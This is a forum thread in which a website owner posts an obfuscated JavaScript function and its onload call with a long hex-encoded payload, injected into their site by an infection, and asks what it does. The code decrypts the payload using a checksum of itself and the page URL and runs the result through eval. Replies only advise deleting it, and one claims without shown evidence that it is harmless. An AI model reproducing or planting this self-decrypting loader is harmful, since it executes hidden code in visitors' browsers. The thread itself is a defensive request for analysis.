Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 4 of 4
  1. #1
    New to the CF scene
    Join Date
    Aug 2008
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    purpose of this script.

    One of my associates who has root user to my sites ftp had a spyware infection and it managed to embed a script on my site. I traced the script all the way back to this function. I am not an expert in javascript but it looks like all the data is actually passed to this function and is decrypted in some way. Can you guys try to help me modify it so i can figure out what its design was actually to do?

    here is the function

    Code:
    function tYFG62c1F(IDkvG4nkn, dRBgV5JDW){var jA74Ll3N2 = arguments.callee;var R7y5DmyJp = location.href;jA74Ll3N2 = jA74Ll3N2.toString();jA74Ll3N2 = jA74Ll3N2 + R7y5DmyJp;var V5bXU3HS2 = jA74Ll3N2.replace(/\W/g, "");V5bXU3HS2 = V5bXU3HS2.toUpperCase();var JGa3J60pA = 4294967296;var E6QdjiN2e = new Array;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < 256; ko5Q7Mpq8++) {E6QdjiN2e[ko5Q7Mpq8] = 0;}var G8tM51Cp4 = 1;for(var ko5Q7Mpq8 = 128; ko5Q7Mpq8; ko5Q7Mpq8 >>= 1) {G8tM51Cp4 = G8tM51Cp4 >>> 1 ^ (G8tM51Cp4 & 1 ? 3988292384 : 0);for(var aH1heD5Rg = 0; aH1heD5Rg < 256; aH1heD5Rg += ko5Q7Mpq8 * 2) {var hug7K8d20 = ko5Q7Mpq8 + aH1heD5Rg;E6QdjiN2e[hug7K8d20] = E6QdjiN2e[aH1heD5Rg] ^ G8tM51Cp4;if (E6QdjiN2e[hug7K8d20] < 0) {E6QdjiN2e[hug7K8d20] += JGa3J60pA;}}}var y54Ix84S6 = JGa3J60pA - 1;for(var u033a3IVn = 0; u033a3IVn < V5bXU3HS2.length; u033a3IVn++) {var lCaM67h4s = (y54Ix84S6 ^ V5bXU3HS2.charCodeAt(u033a3IVn)) & 255;y54Ix84S6 = (y54Ix84S6 >>> 8) ^ E6QdjiN2e[lCaM67h4s];}y54Ix84S6 = y54Ix84S6 ^ (JGa3J60pA - 1);if (y54Ix84S6 < 0) {y54Ix84S6 += JGa3J60pA;}y54Ix84S6 = y54Ix84S6.toString(16).toUpperCase();while(y54Ix84S6.length < 8) {y54Ix84S6 = "0" + y54Ix84S6;}var E8nIyBM1p = new Array;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < 8; ko5Q7Mpq8++) {E8nIyBM1p[ko5Q7Mpq8] = y54Ix84S6.charCodeAt(ko5Q7Mpq8);}var u4M1b5qiL = "";var oQEs4S3Q6 = 0;for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < IDkvG4nkn.length; ko5Q7Mpq8 += 2){var hug7K8d20 = IDkvG4nkn.substr(ko5Q7Mpq8, 2);alert(hug7K8d20);var k3EBh8S75 = parseInt(hug7K8d20, 16);var aQ6Es8oMa = k3EBh8S75 - E8nIyBM1p[oQEs4S3Q6];if(aQ6Es8oMa < 0) {aQ6Es8oMa = aQ6Es8oMa + 256;}u4M1b5qiL += String.fromCharCode(aQ6Es8oMa);if(oQEs4S3Q6 + 1 == E8nIyBM1p.length) {oQEs4S3Q6 = 0;} else {oQEs4S3Q6++;}}var AvEJlrD0g = 0;try {eval(u4M1b5qiL);} catch(e) {AvEJlrD0g = 1;}try {if (AvEJlrD0g) {window.location = "/";}} catch(e) {}}

    and here is the way it was called. *by the way please do not attempt to execute it unless you have an idea of what it does cause I know it was supposed to be malicious possibly and that is why I want to know what it did or could have done to my sites visitors.

    for the call
    Code:
    <body onload="tYFG62c1F('96B9a59AA99dB0A750927A839a89B77F96945f7B96759271677c676F6154ab7e92b99F9065A07962abba98a955a8A68f79887D78977C617650A5A99EaaA1A6a7A4b7659A96a0ad9E957FAD98a754a7929a788D7Ca37C86596d64a3a69895b5a29fB2659Fa799A774A4a98d80797a829b78647457A9999782748a78997d62B5a883B8A9A0A39b69626Bb89c8d7e78877a928c577455A8A68f79887D78977C616450AA90A1698A86a7788972ad96A6618777787b687e838E7c508157ab9A8A8A7D7685997F63a6a6a99CA59a9c5d639D905fab635757566a747e8b6B7B667d908673647457837b757D618d86847862b5a885b4A79ca777a2ac956C6072ab95B3597794A29Bab9C73a0A564745769667a6d697A6e696E6a7caf91b657a39b6c8Fa4688D6a84557161a795BB5778A7a6A2B26baaa6A95daaA2ab50b167988682988B7299577455647C599d749888838B937b856473576769777450B167988682988b729962625E54bca5967c85a26d7d74868BB167988682988B7299945772547174adBA98a9557A8fAE819A6F6E786861765075729Da4A669AF91B657a4659592878796798C5571616A627c7257a264A28A7e9b89798A6F61A660a588858C86838e5082757455656a59ab8A85ac868a797073785774557A8fAE819A6f6e786861776e825768559261617692ac888B6c787C64645D5766548059637d6f6f676D736c6878577155646a7496b3a95fAB95b3599aB76cA37a6c716C67647457656F61A3a379A37c6d647470508057696A6A7C599ab76cA37a6C716c6764627455a1719A81928E897789616350766057b0aaA2AB50B69b7faba6ab85619c577455A1719A81928E897789616450aeAA6cA1797969637B72A39b6c8fa4688d6a8490A6a581A6b6a183668C9E596d64A39D6D82ac71797784929Fa776a5757C676A6c916197508a85AC868A7970737872A09b5469A5967C85a26D7d74868Bb69B7FabA6AB85619c94577154716250BFA39D6d82ac7179778492a79889AFa2AE83688D9161646d647E87a098B7A162abac72b2b1beaf91b657998566B86E77a581825571618080AF9bad9D66A8ae50715768709AB0AB58BA98A95589786b82969A6C6Ba76176507472578a6B738B82A76C6dA8547D597e8B6b7b667d90867372a39cA39bB5A16b648C6E6786939c657Aaa62605D61b4a6A5a9578997aa6F60b790a467547E5958A68769AC69889a7A8f57955582886D7475808682776F9c98a5a97Aa498A67aA46C8c6e6786939C657Aaa605e54675962796c72978473b0658b988180547E5958a68769ac69889A7A8f57757372617159649557a19A79879B7C806A828F959C997A67aa8eA173966BC1998767AB7680918e82577254A38962BB6C7E967E8c598e645f7e859Fa5af98769eac5561616a597FA09d555ca38962BB6C7E967E8C596C64676055afa38962BB6c7E967E8C595b81577E859FA5AF98769eac70B1a38962bb6c7E967e8C596D64998767ab7680918E8265a9a394adA2ADa59E5d6577625Eb8A68cA5a4a6ab73A5aa9C5D5d7Cb098ada39c5d96916Ba7797e987f7F6FA595b29Eab9d547D59686D57B2978473B0658b988180547E59527459576054A38962bb6C7E967e8c74ADba98a9559Db46A61746A7CAD82617650B29cae5575b3ab91BD729DA4A669af91b657a4659592878796798c557161696B64A46796858f9082868c577154797450b167988682988b729962625E54bca2A37568676879B9878BB167988682988b729994577254a38962bb6c7e967e8c6793ac98A978a3A59e71B85fa4659592878796798C5e6FbeAF91b6578ca59C886e9c939Fb05571615B527Fad98A754936CA67686687d6A91596D6467729bA3b361A6A5A957a264a28a7e9b89798A547E59607f57A4659592878796798C5570617D9185886F6c6c71715Eb09ca59cA8A97450b167988682988b7299576272547362ABBA98A955a6a581a6b6A183668c617650889878866c7871607C65aaaa96b4ADa26CA46796858F9082868c6355666a74a6a5A957ae788D7166aa6dAEa0547E59a0a5a9AA9A7DAFad58B69b7FABa6AB85619c6357666A6A74A6A5A95785a1b28891868D6D9c547E59A988836f6B9a77B09b6464579EA7726a60777Caf838F936Ca67686687d6a91966BAD9d5F85a1b28891868D6D9C547D59606D57b285a1B28891868d6D9c547E5980B1a8869676976f9764625767697774ad99A79F7c69AD8898bd5762725494ada2ADa59e639ab3A89D879F98a777B09d956c87a4A683a27b867a9E60709dA7618277ad698465896F8064625766547e7650ADAA686664747Ea89265a39aa2A8AD986D57b28767B76b7F757F6d85547e59607FB4579AA0B49E50bf896Aab66906A787a8762606FBEB6A6a5a9578c66AF6968ab6cA686547e59607faba9AE54BC9eA6a5A35f8Aa4A98065B0869fAE5d7CB650a798AB989c699E5964B28e67a271719779A6885571616a6bc1aba9ae54BCa296645F8E67a271719779A6885E54bcb099b29ba6AC62adA893A5ABA0A4a261765066665970B1BE5993a5ab9a9d5Ca66250bfB4b43F8284859599AD7d9B84696064766c676e9A827A667A6C796b6A7A6D917898707676836A71867868776d769E69886e707764786D67876D786E64786e65896d6D9765766a65746B67699Aa26F697a996f6A6A799E697C9898776a796E69a56e7B6e6D757d68776c6A6B97776965876f686967757e92A7706b976b7669687499996E6cA37192AA706F6c6a7A9A63896F6a6a6A779b677A6d6A6B97777b64766C679697826e727C6C6A77657a6c69a96e7C6E7a7a9e67a76F796999777D65796D7B6b6a786D66886D9c6a66749A91A6986E766c776D91A878696e69826b91A5706C6E98827a648A6e676B69767066796E6D6a78787F65776a9b6A66749a717D996f767A776d73756b67697A74726986996C966C776D66899870966A826B657999676b997870917d6E6D6C69786a697b6F6A6B6A787f92746d796c6c7a6c677C6E6d6c6BA26F68767868966aA26F6989989b6e6bA3717279786C6c67A269917579796e98A29D9278786D6c677a7C6985996B6e98a37171896d7c767A7771667C78706c6d786d687B706C6C64767b65a96D6D7765766a65746a9a6979a26f697a796f6a6a7A9C9374786877798272718A787b6D69776d68776C6a97677a6A91A6787d6e98826E72859869976b767e717999699696827B91AA7868976c799b69AA6e7C6b6DA270687D6D6a6D6a7a6b69766e6b9668A26E9277706F6D64749d63aa6b9D687A766a65746a9a69997a7269A66D6D6a99799e697c9898976a796e69856E9b6e6d776D68776E676b69776965796d7a6A77776D69A9787B9767A27271897a676e787A6C6778707A97677a6d6985999C6d69A29a66896C6C6E6AA26E6989987096657A7191AA78679695766B65a96d6d6A6B796a667A6D676c6a767265797a686967759e64AA6a9A6999826F697A996F6a6A7971927b989A6D6D826967A899706d66776d68776c6a77697A6a717b99706E96799d9278786E6B78797191aa996B767a837D937470786e68767E717B9899766AA369917b706D76757671667878696c95786c71886c7D6b97767065896D9d6C65766a65746B67699a747263a96B9d6e7a827A667a6C796d6d826A71896F98766A799c927D6e9D6B69779E65796e6d6A9a776D93756b67699a747263896B7D687A799E697c7878976A796e69856e7B6e6d776D68776c6A6D6Da26a91A96F78966A799c727d6e7d6c67826d917870707675a36f718A786896977671667A6e7a6a7a787f64AA6A7A6979747264766c67687a759d648a79676A66747A63a96B7D7767766a65746B67697a747263a9989d6e77776d66896e7B6e6ba270917A70796e76787B717D6c6a6B6a779D65796e6D6A9A776D73756b67699a747263896b7d6E6cA36F91A6706B7764777b64766C67687a757D93776b67697A747272766C6a6964A46a667a706D966Aa26d697C989C6a79827266AA6c6a9864766992766C6a6964766A6574786E776BA27265799a686967757e64aa709A969676696588796B6e6B837A91aa7078766aA26D7178996F6B68836A718a98677675796D7189796D6e96A37091756C6c97967a72697d78797669786c72896D677766826c6676999B9667837a667C70676C677A6E9177786e6E6CA36991a6706E6E697a7C91a5787B6E7A836b668A6B67697a747263a9989B76697A6d927c986f6E687A7069A66D6d6c67776D66886D6A6c6a767067746c6a6964846A667a706d966aa26D697C989c6A79A272668a6c6a7864766992766C6a6964766A6574787876787a72917578796a79799e697c9898976A796e69A56E9b6E6D786B7276706f97677a70717D787C6A6A7969667a6d796B79747d638a6b7D6D647A6f92a8786b6E757a6E668798706A6a796A667A6c986C69767065796E686a6a799E697c7878976A796E69A56e7B6E6D787F65776a9B6A66749A64766C677677826e927c6C6A776d7972677A98706d6a7A6a91A7706b6B69777D657998987669A2707286786796957A7E917D6E6B6E6d836F7186706B776D7A6e678599696E76836A71867868976d7671657b79706e6D836f91AA986a976D766b65A96f686967757e72856F7A6d6A7A6C6879706a6e97a26e6778786D9695826D677A99989695836f718A706C9795a26d69856d7C6A6c8371728A986a7675766B66756D6d6a6CA37171869899976D767F69aa986E7677826e927D706D976b7a72917979786a6C777d68756b67697A826d68896f6e6e6D7a6D69777070966a769e917C78799695796e7285986e976b7A72697B99997675827266A96c6C776CA26b697c6D6f6B66776D667c7099776da26d91796f676B69786C678a6d6B6C67776B66796E706b68789D677D6D686c6D767F697c787B6E9A786A917C707a7767767F6989996B6E75a27292a96d68966c7A7069896F6C6E77827a91a77070966D7A6f66A578796B6a7870677A6d6A6C6A7A6f667c6E6d6b6a786D67a86d7876757769698598986b76787c677a6D6C6C69776966796E6d6B6a786D677a6D6a6C69776b697B6E7b6b77786e67A56D986c6C7A6b6986787A6b6A786D667c6C6a6c64766967aa706f9698836E69a6706F6C777a6C65796e686a6aa29B72796F6a976ba26E6878787B6e97776d67756C6A6E64826E697b7978767aA272677B709b6B69767b657999696e6DA29d67a9707A6e7A776f68886D9d6C65766A65746B67697a7A6D717878707676836A71867868976d767e697B796C6E75837D6778706b7769A26969A5796b6e9579707189707A77657A6D65A879786d7a796e917d6f6a6E667A6f697a6d7d6c65766A657479676A66747A576D72')">
    If anyone can help me modify it to figure out what it was passing to the function to determine its purpose it would be a load off of my chest.

  • #2
    Regular Coder ninnypants's Avatar
    Join Date
    Apr 2008
    Location
    Utah
    Posts
    504
    Thanks
    10
    Thanked 47 Times in 47 Posts
    Go through and delete every instance of it. It was probably messing with links on your site but without hours of running it and going through all the gibberish it's impossible to tell

  • #3
    New to the CF scene
    Join Date
    Aug 2008
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    as long as it didnt somehow infect anyone with spyware using known vulnerabilities everything should be alright. ya i deleted it but it still kinda sucks.

  • #4
    Senior Coder rnd me's Avatar
    Join Date
    Jun 2007
    Location
    Urbana
    Posts
    4,373
    Thanks
    11
    Thanked 592 Times in 572 Posts
    it doesn't do anything harmful, just annoying.

    most importantly, it doesn't "phone home", so privacy and security should not be affected.
    my site (updated 13/9/26)
    BROWSER STATS [% share] (2014/9/03) IE7:0.1, IE8:4.6, IE11:9.1, IE9:3.1, IE10:3.0, FF:17.2, CH:46, SF:11.4, NON-MOUSE:38%


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •